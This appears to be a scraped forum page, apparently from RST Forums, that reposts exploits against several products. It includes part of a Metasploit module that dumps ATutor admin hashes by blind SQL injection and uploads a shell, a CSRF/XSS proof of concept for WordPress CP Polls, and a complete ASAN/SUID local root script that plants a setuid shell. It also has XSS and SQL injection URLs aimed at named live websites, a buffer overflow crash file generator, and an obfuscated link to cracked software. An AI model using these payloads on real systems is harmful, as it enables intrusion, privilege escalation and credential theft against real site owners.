'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$2};" if res.get_cookies =~ /(.*); ATutorID=(.*);/

# this is what happens when no state is maintained by the http client
if res && res.code == 302
if res.redirection.to_s.include?('bounce.php?course=0')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
if res && res.code == 302 && res.redirection.to_s.include?('users/index.php')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, res.redirection),
'cookie' => cookie,
'agent' => 'Mozilla'
})
cookie = "ATutorID=#{$1};" if res.get_cookies =~ /ATutorID=(.*);/
return cookie
end
else res.redirection.to_s.include?('admin/index.php')
# if we made it here, we are admin
return cookie
end
end

# auth failed if we land here, bail
fail_with(Failure::NoAccess, "Authentication failed with username #{username}")
return nil
end

def perform_request(sqli, cookie)
# the search requires a minimum of 3 chars
sqli = "#{Rex::Text.rand_text_alpha(3)}'/**/or/**/#{sqli}/**/or/**/1='"
rand_key = Rex::Text.rand_text_alpha(1)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "mods", "_standard", "social", "connections.php"),
'vars_post' => {
"search_friends_#{rand_key}" => sqli,
'rand_key' => rand_key,
'search' => 'Search People'
},
'cookie' => cookie,
'agent' => 'Mozilla'
})
return res.body
end

def dump_the_hash(cookie)
extracted_hash = ""
sqli = "(select/**/length(concat(login,0x3a,password))/**/from/**/AT_admins/**/limit/**/0,1)"
login_and_hash_length = generate_sql_and_test(do_true=false, do_test=false, sql=sqli, cookie).to_i
for i in 1..login_and_hash_length
sqli = "ascii(substring((select/**/concat(login,0x3a,password)/**/from/**/AT_admins/**/limit/**/0,1),#{i},1))"
asciival = generate_sql_and_test(false, false, sqli, cookie)
if asciival >= 0
extracted_hash << asciival.chr
end
end
return extracted_hash.split(":")
end

def get_ascii_value(sql, cookie)
lower = 0
upper = 126
while lower < upper
mid = (lower + upper) / 2
sqli = "#{sql}>#{mid}"
result = perform_request(sqli, cookie)
if result =~ /There are d entries./
lower = mid + 1
else
upper = mid
end
end
if lower > 0 and lower < 126
value = lower
else
sqli = "#{sql}=#{lower}"
result = perform_request(sqli, cookie)
if result =~ /There are d entries./
value = lower
end
end
return value
end

def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie)
if do_test
if do_true
result = perform_request("1=1", cookie)
if result =~ /There are d entries./
return true
end
else not do_true
result = perform_request("1=2", cookie)
if not result =~ /There are d entries./
return true
end
end
elsif not do_test and sql
return get_ascii_value(sql, cookie)
end
end

def test_injection(cookie)
if generate_sql_and_test(do_true=true, do_test=true, sql=nil, cookie)
if generate_sql_and_test(do_true=false, do_test=true, sql=nil, cookie)
return true
end
end
return false
end

def report_cred(opts)
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}

credential_data = {
module_fullname: fullname,
post_reference_name: self.refname,
private_data: opts[:password],
origin_type: :service,
private_type: :password,
username: opts[:user]
}.merge(service_data)

login_data = {
core: create_credential(credential_data),
status: Metasploit::Model::Login::Status::SUCCESSFUL,
last_attempted_at: Time.now
}.merge(service_data)

create_credential_login(login_data)
end

def exploit
student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false)
print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...")
report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD'])

print_status("Dumping username and password hash...")
# we got admin hash now
credz = dump_the_hash(student_cookie)
print_good("Got the #{credz[0]} hash: #{credz[1]} !")
if credz
admin_cookie = login(credz[0], credz[1], true)
print_status("Logged in as #{credz[0]}, uploading shell...")
# install a plugin
if upload_shell(admin_cookie)
print_good("Shell upload successful!")
# boom
exec_code
end
end
end
end

 

exploit source : packetstormsecurity.com

[WordPress CP Polls 1.0.8 File Upload / Cross Site Scripting]

daca dai comment doar ca sa fie la numar te inteleg ....dar ca nu citesti CREDITS asta sincer nu prea o inteleg

[WordPress CP Polls 1.0.8 File Upload / Cross Site Scripting]

# Exploit Title: WordPress CP Polls 1.0.8 - Cross-site file upload & persistent XSS
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8

=============
Description
=============

With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results.
You can receive email notifications every time a vote is added or opt to receive Excel reports periodically.

The Polls can have dependant questions, this means that some questions are displayed depending of the
selection made on other questions.

(copy of README.txt)


===================
Technical details
===================

CP Polls plugin for wordpress is prone to persistent XSS via cross-site file upload.
When we register an cp_poll, it is sanitized correctly but when we upload a CSV file, we can
bypass the protection and inject malicious HTML/Javascript.

There are not CSRF protection in that action so it can be exploited with a CSRF attack by sending a
malicious link to a victim (administrator) a wait for execution of the malicious request.

=========================
Proof of Concept (html)
=========================

<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://<wp.host>/wp-admin/admin.php?page=CP_Polls&cal=1&list=1&import=1", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------17460754011784");
xhr.setRequestHeader("Accept-Language", "es-MX,es-ES;q=0.9,es;q=0.7,es-AR;q=0.6,es-CL;q=0.4,en-US;q=0.3,en;q=0.1");
xhr.withCredentials = true;
var body = "-----------------------------17460754011784\r\n" +
"Content-Disposition: form-data; name="importfile"; filename="csv.csv"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"2013-04-21 18:50:00, 192.168.1.12, <img src=x onerror=alert('You_are_owned!')>,
"<img src=x onerror=alert('I am scared!')>", "sample subject", ""\r\n" +
"-----------------------------17460754011784\r\n" +
"Content-Disposition: form-data; name="pbuttonimport"\r\n" +
"\r\n" +
"Import\r\n" +
"-----------------------------17460754011784--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>


==========
CREDITS
==========

Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


========
TIMELINE
========

2016-02-10 vulnerability discovered
2016-02-22 reported to vendor
2016-03-01 released cp polls v1.0.9
2016-03-01 public disclousure

 

[WordPress CP Polls 1.0.8 Malicious File Download]

# Exploit Title: WordPress CP Polls 1.0.8 - Reflected file download (.bat file)
# Date: 2016-02-22
# Google Dork: Index of /wp-content/plugins/cp-polls/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Plugin URI: http://wordpress.dwbooster.com/forms/cp-polls
# Version: 1.0.8
# Demo: https://www.youtube.com/watch?v=uc6P59BPEkU

=============
Description
=============

With **CP Polls** you can publish a poll into a page/post and optionally display statistics of the results.
You can receive email notifications every time a vote is added or opt to receive Excel reports periodically.

The Polls can have dependant questions, this means that some questions are displayed depending of the
selection made on other questions.

(copy of README.txt)


===================
Technical details
===================

CP Polls plugin for wordpress is prone to file download issue. A hacker is able to attack an administrator by
exploiting a CSRF in the 'change cp poll name' converting the downloadable report file (csv) to a malicious .bat file.
Because there is not restriction in the cp poll name the CSRF exploit can change the name to ...

malicious.bat;

The semicolon (;) character must be restricted because the header 'Content-Disposition' uses this characteer as a
parameter delimitation. For example, when we change the name of a cp poll to 'malicious.bat;' when an administrator
download the report (thinking that is a csv file) the response header turns:
""
Content-Disposition: attachment; file=malicious.bat;.csv
""
the csv is ignored and the administrator gets a .BAT file


So, how to exploit this vulnerability to execute commands on the victim's machine?
Whe have an option. If the cp_poll is added in a post we can vote them and we can inject our malicious payload
into a votation.

==============================
Proof of Concept CSRF (html)
==============================

https://www.youtube.com/watch?v=uc6P59BPEkU

==========================

If the csrf attack is succesful, we only need to inject our commands in votations. In ´fieldnames´ post parameter
we can inject our commands.

==========
CREDITS
==========

Vulnerability discovered by:
Joaquin Ramirez Martinez [i0 security-lab]
joaquin.ramirez.mtz.lab[at]gmail[dot]com
https://www.facebook.com/I0-security-lab-524954460988147/
https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q


========
TIMELINE
========

2016-02-10 vulnerability discovered
2016-02-22 reported to vendor
2016-03-01 released cp polls v1.0.9
2016-03-01 public disclousure

 

[ASAN/SUID Local Root Exploit]

#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
# Released under the Snitches Get Stitches Public Licence.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (18/02/2016)
# FREE LAURI LOVE!
echo "Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)"
if [[ $# -eq 0 ]] ; then
echo "use: $0 /full/path/to/targetbin"
echo "where targetbin is setuid root and compiled w/ ASAN"
exit 0
fi
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
chown("/tmp/rootshell", 0, 0);
chmod("/tmp/rootshell", 04755);
unlink("/etc/ld.so.preload");
printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we drop our python symlink spraying tool..."
cat << EOF > sym.py
#!/usr/bin/python
import os
curpid=os.getpid()
print curpid
for x in range(0,100):
newpid=curpid+x
boom = "foo.%s" %(str(newpid))
os.symlink("/etc/ld.so.preload", boom)
EOF
echo "[+] Spraying dir with symlinks..."
python sym.py
echo "[+] Hack the planet!"
ASAN_OPTIONS='suppressions="/hacktheplanet
/tmp/libhax.so
hacktheplanet" log_path=./foo verbosity=1' $1 >/dev/null 2>&1
$1 >/dev/null 2>&1
echo "[+] Tidy up a bit..."
rm -f foo*
rm -f sym.py
rm -f /tmp/libhax.so
echo "[<3] :PPpPpPpOpr000000t!"
/tmp/rootshell

 

[WebSPELL 4.2.4 sqli]

Advisory ID: HTB23291
Product: webSPELL
Vendor: webSPELL.org
Vulnerable Version(s): 4.2.4 and probably prior
Tested Version: 4.2.4
Advisory Publication:  January 22, 2016  [without technical details]
Vendor Notification: January 22, 2016 
Vendor Patch: February 12, 2016 
Public Disclosure: February 17, 2016 
Vulnerability Type: SQL Injection [CWE-89]
Risk Level: Medium 
CVSSv3 Base Score: 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered two vulnerabilities in a popular CMS webSPELL developed for the needs of esport related communities. The vulnerability allows a remote authenticated attacker with cashbox access privileges to execute arbitrary SQL commands in applications database and completely compromise the vulnerable website. This vulnerability can be also exploited by non-authenticated and unprivileged attacker via the CSRF vector, to which the system is also prone. 

The vulnerability exists due to insufficient filtration of user-supplied data passed via "payid" HTTP POST parameter to "/cash_box.php" script. A remote authenticated attacker, with cashbox access privileges, can alter the present SQL query and execute arbitrary SQL commands in applications database. 

A simple exploit below uses a time-based SQL injection technique to determine current version of MySQL server. The page will be loaded with some delay, if the current MySQL server version is 5.x:


<form action="http://[host]/cash_box.php" method="post" name="main">
<input type="hidden" name="pay" value="1">
<input type="hidden" name="payid[' PROCEDURE analyse((select extractvalue(rand(), concat(0x3a, (IF(MID(version(), 1, 1) LIKE 5, BENCHMARK(5000000, SHA1(1)), 1))))), 1) -- 2]" value="1">
<input value="submit" id="btn" type="submit" />
</form>


This vulnerability can be also exploited via CSRF vector, as the "/cash_box.php" script does not validate origin of HTTP request before processing user-supplied data in SQL query.


-----------------------------------------------------------------------------------------------

Solution:

Update to webSPELL 4.2.5

More Information:
https://github.com/webSPELL/webSPELL/issues/309

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23291 - https://www.htbridge.com/advisory/HTB23291 - SQL Injection in webSPELL
[2] webSPELL - https://www.webspell.org/ - webSPELL is a free content management system under GNU GPL for creating websites easily
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

 

[[EXCLUSIV] Atomic Email Studio 8.40]

On 12/21/2014 at 9:43 AM, RFR said:

h**p://w*w56.zippyshare.c*m/v/1843063/file.html

 

 

aHR0cHM6Ly9yc3Rmb3J1bXMuY29tL2ZvcnVtLzkzNzY5LWV4Y2x1c2l2LWF0b21pYy1lbWFpbC1zdHVkaW8tOC00MC1hLnJzdA==

 

Base-64

Am si ultima versiune doar pt. RST Forum.

 

arhiva nu e buna inclusiv cu parola decriptata in base 64

[VANIRA CMS Cross Site Scripting]

######################
# Exploit Title : VANIRA CMS Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://tursweb.com/
# Google Dork : "Web Design > Tursweb.com " lang=
# Date: 2016/02/23
# Version : 6
######################
# PoC:
# lang=[XSS]
# Payload = '><img onerror=alert(1) src="asd">
#
# http://hncmed.ir/home.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://gceramas.ir/pdview.php?&lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://isatismodava.com/home.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://spadk9.com/shopcat.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
# http://iransommer.com/productcat.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
###################### 

 

[STIMS Cutter 1.1.3.20 SEH Overwrite Buffer Overflow]

# Exploit Title: STIMS CUTTER OVERFLOW SEH OVERWRITE
# Date: 19 Feb 2016
# Exploit Author: Shantanu Khandelwal <shantanu561993@gmail.com
<ishitasailor@gmail.com>>
# Vendor Homepage: http://www.stimslabs.com/
# Software Link: http://www.stimslabs.com/en/cutter/STIMSCutterEnSetup.exe
# Version: 1.1.3.20
# Tested on: Windows XP SP3
# CVE : UNKNOWN
# ==============HOW TO CRASH ==================
#make the cutt file and open it it the STIMS Cutter application.
#Click on Build Report
#===========================================
#Problems in exploitation
#Unable to find suitable SEH pointer
#


#!/usr/bin/env python
f=open("crash.cutt","w")

payload = """<!--block:#solution-->
[solution]
name="""
payload+="A"*8452
payload +="BBBB" #SEH overwrite
payload +="""CCCC
desc=A
time=0
version=1
file=C:Documents and SettingsIEUserDesktopABC.cutt
time.created=131003117142810000
app=1.1.3
projects=1
<!--#solution:block-->
<!--block:A-->
[properties]
optimize=0
level=0
diversity=0
status=0
active=1
remnants=0
sort=0
version=1
desc=S
comment=
comment.active=0
notes=
notes.active=0
material=A
progress=100
calculation=0D99FF12
cost=222.000
time.gone=0
time.date=2016 Feb 18 23.29.14
payload=2
file=C:Documents and SettingsIEUserDesktopABC.cutt
app=1.1.3

[order.blanks]
b001={ "uid": "908113387", "material": "A", "length": "222", "quantity":
"1", "knife": "1", "indent": "11", "cost": "1.0", "comment": "1", "id":
"1", "name": "a" }

[order.pieces]
p001={ "uid": "124270241", "material": "A", "length": "111", "quantity":
"1", "label": "1", "comment": "1", "id": "1", "name": "a", "orphans": "0" }

[layout.summary]
summary={ "output": "112.000", "used.len": "222.000", "used": "1",
"pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1",
"remnants": "0.000", "srest": "110.000", "cost": "222.000", "cost.ppu":
"1.982", "brest": "110.0", "status": "", "type": "summary", "time.gone":
"0", "time.date": "2016 Feb 18 23.29.14" }
blank01={ "name": "a", "cost": "1.000000", "blank": "1", "used": "1",
"pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1", "output":
"112.000", "used.len": "222.000", "cost.sum": "222.000", "cost.ppu":
"1.982", "remnants": "0.000" }

[layout.cuttings]
c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1",
"shifts": "1", "output": "#1 1", "layout": "111" }

[layout.cuttings.parts]
c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1",
"shifts": "1", "output": "#1 1", "layout": "111", "name": "1" }
<!--A:block-->
"""

f.write(payload)
f.close()

 

[Problema logica pentru toate varstele]

buna cea cu pestii bv

[2016 Website Developed by Silvery Infotech SQL injection]

#####################
# Exploit Title : 2016 Website Developed by Silvery Infotech sql injection
# Exploit Author : Ashiyane Digital Security Team
# Google Dork : "intext:Developed by Silvery Infotech" inurl:page.php?id=
# Date: 20 Feb 2016
# Tested On : Windows 10 , Kali linux
#################################
# Exploit And Demo:
# Vulnerable PHP File = page.php
# Vulnerable Parameter = id
#
# Attack Like :
http://artlinkinteriors.com/page.php?id=-1%27%20and/**x**/@ghasem20:=concat_ws%280x3c62723e,@@version%29%20UNION%20SELECT%201,2,3,4,5,group_concat%280x3c62723e,table_name%29,7,8,9%20from%20information_schema.tables%20where%20table_schema=database%28%29--%20-
######################
# discovered by : ghasem20
# tnx : h_sqli.empire
######################

[Dimofinf CMS 3.0.0 Cross Site Scripting]

	

Dimofinf CMS 3.0.0 Cross Site Scripting
Published
	
Credit
	
Risk
2016.02.18
	
Persian Hack Team
	
Low
CWE
	
CVE
	
Local
	
Remote
CWE-79
	
N/A
	
No
	
Yes
Dork: "Powered by Dimofinf cms Version 3.0.0"



######################
# Exploit Title : Dimofinf CMS 3.0.0 Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.dimofinf.net/index.php
# Google Dork : "Powered by Dimofinf cms Version 3.0.0"
# Date: 2016/02/17
# Version = 3.0.0
######################
# PoC:
# Username: MobhaM" onmouseover=alert("MobhaM") bad="
# Password : 0
#
# http://www.dawadmisms.net/dimcp/login.php
# http://www.aswarzan.com/dimcp/login.php
# http://drhananclinic.com.sa/dimcp/login.php
# http://www.newsqassim.com/dimcp/login.php
# http://www.sudaninet.net/dimcp/login.php
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################